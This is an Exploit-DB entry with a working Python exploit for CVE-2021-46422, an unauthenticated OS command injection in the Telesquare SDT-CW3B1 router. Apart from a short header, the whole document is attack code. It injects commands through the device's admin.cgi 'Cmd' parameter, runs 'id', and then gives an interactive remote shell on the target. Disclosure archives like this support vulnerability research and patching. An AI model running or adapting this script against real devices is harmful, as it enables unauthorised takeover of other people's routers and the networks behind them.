Telesquare SDT-CW3B1 1.1.0 - OS Command Injection

EDB-ID:

50948




Platform:

Hardware

Date:

2022-06-03


#!/usr/bin/python3 

# Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
# Date: 24th May 2022
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage: http://telesquare.co.kr/
# CVE : CVE-2021-46422
# Authentication Required: No

import requests 
import argparse 
import sys
from xml.etree import ElementTree

def sysArgument():
	ap = argparse.ArgumentParser()
	ap.add_argument("--host", required=True, help="target hostname/IP")	
	args = vars(ap.parse_args())
	return args['host']

def checkHost(host):
	url = "http://" + host

	print("[*] Checking host is it alive?")

	try:
		rsl = requests.get(url) 
		print("[*] The host is alive.")
	except requests.exceptions.Timeout as err:
		raise SystemExit(err)

def exploit(host):
	url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=" 

	#checking does the CGI exists?
	rsl = requests.get(url)

	if(rsl.status_code == 200):
		print("[*] CGI script exist!")
		print("[*] Injecting some shell command.")

		#1st test injecting id command
		cmd = "id"

		try:
			rsl = requests.get(url + cmd, stream=True)
			xmlparser = ElementTree.iterparse(rsl.raw)

			cmdRet = []

			for event, elem in xmlparser:
				if(elem.tag == 'CmdResult'):
					cmdRet.append(elem.text)
		except:
			print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit")
			sys.exit(0)

		if(len(cmdRet) != 0):
			print("[*] There's response from the CGI script!")
			print('[*] System ID: ' + cmdRet[0].strip())
			
			print("[*] Spawning shell. type .exit to exit the shell", end="\n\n")
			#start shell iteration
			while(True):
				cmdInput = input("[SDT-CW3B1 Shell]# ")

				if(cmdInput == ".exit"):
					print("[*] Exiting shell.")
					sys.exit(0)

				rsl = requests.get(url + cmdInput, stream=True)
				xmlparser = ElementTree.iterparse(rsl.raw)


				for event, elem in xmlparser:
					if(elem.tag == 'CmdResult'):
						print(elem.text.strip())

				print('\n')
				
		else:
			print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.")
			sys.exit(0)

	else:
		print("[!] CGI script not found.")
		print(rsl.status_code)
		sys.exit(0)

def main():
	host = sysArgument()

	checkHost(host)
	exploit(host)

if  __name__ == "__main__":
	main()